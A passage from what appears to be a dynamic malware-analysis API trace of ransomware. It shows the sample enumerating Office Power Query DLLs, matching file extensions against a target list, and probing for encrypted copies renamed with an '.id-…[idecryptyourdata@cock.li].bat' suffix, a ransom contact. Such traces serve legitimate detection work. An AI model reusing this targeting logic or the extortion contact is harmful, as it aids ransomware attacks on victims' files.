Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\nl\\Microsoft.MashupEngine.resources.dll") returned 141 [0169.719] lstrlenW (lpString=".dbf") returned 4 [0169.720] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0169.720] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\nl\\Microsoft.MashupEngine.resources.dll") returned 141 [0169.720] lstrlenW (lpString=".1cd") returned 4 [0169.720] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0169.720] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\nl\\Microsoft.MashupEngine.resources.dll") returned 141 [0169.720] lstrlenW (lpString=".jpg") returned 4 [0169.720] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0169.720] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\nl\\Microsoft.MashupEngine.resources.dll") returned 141 [0169.720] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\nl\\Microsoft.MashupEngine.resources.dll") returned 141 [0169.720] lstrlenW (lpString=".doc") returned 4 [0169.720] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0169.720] lstrlenW (lpString=".docx") returned 5 [0169.720] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0169.720] lstrlenW (lpString=".pdf") returned 4 [0169.720] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0169.720] lstrlenW (lpString=".xls") returned 4 [0169.720] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0169.720] lstrlenW (lpString=".xlsx") returned 5 [0169.720] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0169.720] lstrlenW (lpString=".ppt") returned 4 [0169.720] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0169.720] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\nl\\Microsoft.MashupEngine.resources.dll") returned 141 [0169.721] lstrlenW (lpString=".zip") returned 4 [0169.721] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0169.721] lstrlenW (lpString=".rar") returned 4 [0169.721] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0169.721] lstrlenW (lpString=".bz2") returned 4 [0169.721] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0169.721] lstrlenW (lpString=".7z") returned 3 [0169.721] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0169.721] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\nl\\Microsoft.MashupEngine.resources.dll") returned 141 [0169.721] lstrlenW (lpString=".dbf") returned 4 [0169.721] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0169.721] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\nl\\Microsoft.MashupEngine.resources.dll") returned 141 [0169.721] lstrlenW (lpString=".1cd") returned 4 [0169.721] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0169.721] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\nl\\Microsoft.MashupEngine.resources.dll") returned 141 [0169.721] lstrlenW (lpString=".jpg") returned 4 [0169.721] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0169.721] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0169.721] lstrlenW (lpString="Microsoft.Mashup.Client.Excel.resources.dll") returned 43 [0169.722] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\no\\Microsoft.Mashup.Client.Excel.resources.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\no\\microsoft.mashup.client.excel.resources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x52c [0169.726] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x317ff14 | out: lpFileSize=0x317ff14*=60072) returned 1 [0169.726] CloseHandle (hObject=0x52c) returned 1 [0169.726] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\no\\Microsoft.Mashup.Client.Excel.resources.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\no\\microsoft.mashup.client.excel.resources.dll")) returned 0x220 [0169.726] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\no\\Microsoft.Mashup.Client.Excel.resources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\no\\microsoft.mashup.client.excel.resources.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0169.726] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\no\\Microsoft.Mashup.Client.Excel.resources.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\no\\microsoft.mashup.client.excel.resources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.726] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\no\\Microsoft.Mashup.Client.Excel.resources.dll") returned 148 [0169.726] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\no\\Microsoft.Mashup.Client.Excel.resources.dll") returned 148 [0169.726] lstrlenW (lpString=".doc") returned 4 [0169.726] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0169.727] lstrlenW (lpString=".docx") returned 5 [0169.727] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0169.727] lstrlenW (lpString=".pdf") returned 4 [0169.727] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0169.727] lstrlenW (lpString=".xls") returned 4 [0169.727] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0169.727] lstrlenW (lpString=".xlsx") returned 5 [0169.727] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0169.727] lstrlenW (lpString=".ppt") returned 4 [0169.727] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0169.727] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\no\\Microsoft.Mashup.Client.Excel.resources.dll") returned 148 [0169.727] lstrlenW (lpString=".zip") returned 4 [0169.727] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0169.727] lstrlenW (lpString=".rar") returned 4 [0169.727] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0169.727] lstrlenW (lpString=".bz2") returned 4 [0169.727] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0169.727] lstrlenW (lpString=".7z") returned 3 [0169.727] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0169.727] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\no\\Microsoft.Mashup.Client.Excel.resources.dll") returned 148 [0169.727] lstrlenW (lpString=".dbf") returned 4 [0169.727] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0169.727] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\no\\Microsoft.Mashup.Client.Excel.resources.dll") returned 148 [0169.728] lstrlenW (lpString=".1cd") returned 4 [0169.728] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0169.728] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\no\\Microsoft.Mashup.Client.Excel.resources.dll") returned 148 [0169.728] lstrlenW (lpString=".jpg") returned 4 [0169.728] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0169.728] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\no\\Microsoft.Mashup.Client.Excel.resources.dll") returned 148 [0169.728] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\no\\Microsoft.Mashup.Client.Excel.resources.dll") returned 148 [0169.728] lstrlenW (lpString=".doc") returned 4 [0169.728] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0169.728] lstrlenW (lpString=".docx") returned 5 [0169.728] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0169.728] lstrlenW (lpString=".pdf") returned 4 [0169.728] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0169.728] lstrlenW (lpString=".xls") returned 4 [0169.728] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0169.728] lstrlenW (lpString=".xlsx") returned 5 [0169.728] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0169.728] lstrlenW (lpString=".ppt") returned 4 [0169.728] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0169.728] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\no\\Microsoft.Mashup.Client.Excel.resources.dll") returned 148 [0169.728] lstrlenW (lpString=".zip") returned 4 [0169.728] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0169.728] lstrlenW (lpString=".rar") returned 4 [0169.728] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0169.728] lstrlenW (lpString=".bz2") returned 4 [0169.729] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0169.729] lstrlenW (lpString=".7z") returned 3 [0169.729] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0169.729] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\no\\Microsoft.Mashup.Client.Excel.resources.dll") returned 148 [0169.729] lstrlenW (lpString=".dbf") returned 4 [0169.729] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0169.729] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\no\\Microsoft.Mashup.Client.Excel.resources.dll") returned 148 [0169.729] lstrlenW (lpString=".1cd") returned 4 [0169.729] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0169.729] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\no\\Microsoft.Mashup.Client.Excel.resources.dll") returned 148 [0169.729] lstrlenW (lpString=".jpg") returned 4 [0169.729] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0169.729] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0169.729] lstrlenW (lpString="Microsoft.Mashup.Client.Windows.resources.dll") returned 45 [0169.729] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\no\\Microsoft.Mashup.Client.Windows.resources.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\no\\microsoft.mashup.client.windows.resources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x52c [0169.730] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x317ff14 | out: lpFileSize=0x317ff14*=159808) returned 1 [0169.730] CloseHandle (hObject=0x52c) returned 1 [0169.730] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\no\\Microsoft.Mashup.Client.Windows.resources.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\no\\microsoft.mashup.client.windows.resources.dll")) returned 0x220 [0169.731] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\no\\Microsoft.Mashup.Client.Windows.resources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\no\\microsoft.mashup.client.windows.resources.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0170.024] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\no\\Microsoft.Mashup.Client.Windows.resources.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\no\\microsoft.mashup.client.windows.resources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.521] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\no\\Microsoft.Mashup.Client.Windows.resources.dll") returned 150 [0170.521] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\no\\Microsoft.Mashup.Client.Windows.resources.dll") returned 150 [0170.521] lstrlenW (lpString=".doc") returned 4 [0170.521] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0170.521] lstrlenW (lpString=".docx") returned 5 [0170.521] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0170.521] lstrlenW (lpString=".pdf") returned 4 [0170.521] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0170.521] lstrlenW (lpString=".xls") returned 4 [0170.521] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0170.521] lstrlenW (lpString=".xlsx") returned 5 [0170.521] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0170.521] lstrlenW (lpString=".ppt") returned 4 [0170.521] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0170.521] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\no\\Microsoft.Mashup.Client.Windows.resources.dll") returned 150 [0170.522] lstrlenW (lpString=".zip") returned 4 [0170.522] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0170.522] lstrlenW (lpString=".rar") returned 4 [0170.522] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0170.522] lstrlenW (lpString=".bz2") returned 4 [0170.522] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0170.522] lstrlenW (lpString=".7z") returned 3 [0170.522] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0170.522] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\no\\Microsoft.Mashup.Client.Windows.resources.dll") returned 150 [0170.522] lstrlenW (lpString=".dbf") returned 4 [0170.522] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0170.522] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\no\\Microsoft.Mashup.Client.Windows.resources.dll") returned 150 [0170.522] lstrlenW (lpString=".1cd") returned 4 [0170.522] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0170.522] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\no\\Microsoft.Mashup.Client.Windows.resources.dll") returned 150 [0170.522] lstrlenW (lpString=".jpg") returned 4 [0170.522] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0170.522] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\no\\Microsoft.Mashup.Client.Windows.resources.dll") returned 150 [0170.522] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\no\\Microsoft.Mashup.Client.Windows.resources.dll") returned 150 [0170.522] lstrlenW (lpString=".doc") returned 4 [0170.522] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0170.523] lstrlenW (lpString=".docx") returned 5 [0170.523] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0170.523] lstrlenW (lpString=".pdf") returned 4 [0170.523] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0170.523] lstrlenW (lpString=".xls") returned 4 [0170.523] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0170.523] lstrlenW (lpString=".xlsx") returned 5 [0170.523] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0170.523] lstrlenW (lpString=".ppt") returned 4 [0170.523] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0170.523] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\no\\Microsoft.Mashup.Client.Windows.resources.dll") returned 150 [0170.523] lstrlenW (lpString=".zip") returned 4 [0170.523] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0170.523] lstrlenW (lpString=".rar") returned 4 [0170.523] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0170.523] lstrlenW (lpString=".bz2") returned 4 [0170.523] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0170.523] lstrlenW (lpString=".7z") returned 3 [0170.523] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0170.523] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\no\\Microsoft.Mashup.Client.Windows.resources.dll") returned 150 [0170.523] lstrlenW (lpString=".dbf") returned 4 [0170.523] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0170.523] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\no\\Microsoft.Mashup.Client.Windows.resources.dll") returned 150 [0170.523] lstrlenW (lpString=".1cd") returned 4 [0170.523] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0170.523] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\no\\Microsoft.Mashup.Client.Windows.resources.dll") returned 150 [0170.523] lstrlenW (lpString=".jpg") returned 4 [0170.523] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0170.524] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0170.524] lstrlenW (lpString="Microsoft.Mashup.Client.Excel.resources.dll") returned 43 [0170.524] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\sl\\Microsoft.Mashup.Client.Excel.resources.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\sl\\microsoft.mashup.client.excel.resources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x52c [0170.758] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x317ff14 | out: lpFileSize=0x317ff14*=60072) returned 1 [0170.758] CloseHandle (hObject=0x52c) returned 1 [0170.758] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\sl\\Microsoft.Mashup.Client.Excel.resources.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\sl\\microsoft.mashup.client.excel.resources.dll")) returned 0x220 [0170.922] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\sl\\Microsoft.Mashup.Client.Excel.resources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\sl\\microsoft.mashup.client.excel.resources.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0171.007] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\sl\\Microsoft.Mashup.Client.Excel.resources.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\sl\\microsoft.mashup.client.excel.resources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.007] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\sl\\Microsoft.Mashup.Client.Excel.resources.dll") returned 148 [0171.007] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\sl\\Microsoft.Mashup.Client.Excel.resources.dll") returned 148 [0171.007] lstrlenW (lpString=".doc") returned 4 [0171.008] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0171.008] lstrlenW (lpString=".docx") returned 5 [0171.008] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0171.008] lstrlenW (lpString=".pdf") returned 4 [0171.008] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0171.008] lstrlenW (lpString=".xls") returned 4 [0171.008] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0171.008] lstrlenW (lpString=".xlsx") returned 5 [0171.008] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0171.008] lstrlenW (lpString=".ppt") returned 4 [0171.008] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0171.008] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\sl\\Microsoft.Mashup.Client.Excel.resources.dll") returned 148 [0171.008] lstrlenW (lpString=".zip") returned 4 [0171.008] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0171.008] lstrlenW (lpString=".rar") returned 4 [0171.008] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0171.008] lstrlenW (lpString=".bz2") returned 4 [0171.008] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0171.008] lstrlenW (lpString=".7z") returned 3 [0171.008] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0171.008] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\sl\\Microsoft.Mashup.Client.Excel.resources.dll") returned 148 [0171.008] lstrlenW (lpString=".dbf") returned 4 [0171.008] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0171.009] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\sl\\Microsoft.Mashup.Client.Excel.resources.dll") returned 148 [0171.009] lstrlenW (lpString=".1cd") returned 4 [0171.009] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0171.009] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\sl\\Microsoft.Mashup.Client.Excel.resources.dll") returned 148 [0171.009] lstrlenW (lpString=".jpg") returned 4 [0171.009] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0171.009] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\sl\\Microsoft.Mashup.Client.Excel.resources.dll") returned 148 [0171.009] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\sl\\Microsoft.Mashup.Client.Excel.resources.dll") returned 148 [0171.009] lstrlenW (lpString=".doc") returned 4 [0171.009] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0171.009] lstrlenW (lpString=".docx") returned 5 [0171.009] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0171.009] lstrlenW (lpString=".pdf") returned 4 [0171.009] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0171.009] lstrlenW (lpString=".xls") returned 4 [0171.009] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0171.009] lstrlenW (lpString=".xlsx") returned 5 [0171.009] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0171.009] lstrlenW (lpString=".ppt") returned 4 [0171.009] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0171.010] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\sl\\Microsoft.Mashup.Client.Excel.resources.dll") returned 148 [0171.010] lstrlenW (lpString=".zip") returned 4 [0171.010] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0171.010] lstrlenW (lpString=".rar") returned 4 [0171.010] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0171.010] lstrlenW (lpString=".bz2") returned 4 [0171.010] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0171.010] lstrlenW (lpString=".7z") returned 3 [0171.010] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0171.010] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\sl\\Microsoft.Mashup.Client.Excel.resources.dll") returned 148 [0171.010] lstrlenW (lpString=".dbf") returned 4 [0171.010] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0171.010] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\sl\\Microsoft.Mashup.Client.Excel.resources.dll") returned 148 [0171.010] lstrlenW (lpString=".1cd") returned 4 [0171.010] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0171.010] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\sl\\Microsoft.Mashup.Client.Excel.resources.dll") returned 148 [0171.010] lstrlenW (lpString=".jpg") returned 4 [0171.010] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0171.010] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0171.010] lstrlenW (lpString="Microsoft.Mashup.Client.Excel.resources.dll") returned 43 [0171.011] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\uk\\Microsoft.Mashup.Client.Excel.resources.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\uk\\microsoft.mashup.client.excel.resources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0171.014] GetFileSizeEx (in: hFile=0x434, lpFileSize=0x317ff14 | out: lpFileSize=0x317ff14*=69696) returned 1 [0171.014] CloseHandle (hObject=0x434) returned 1 [0171.014] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\uk\\Microsoft.Mashup.Client.Excel.resources.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\uk\\microsoft.mashup.client.excel.resources.dll")) returned 0x220 [0171.014] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft 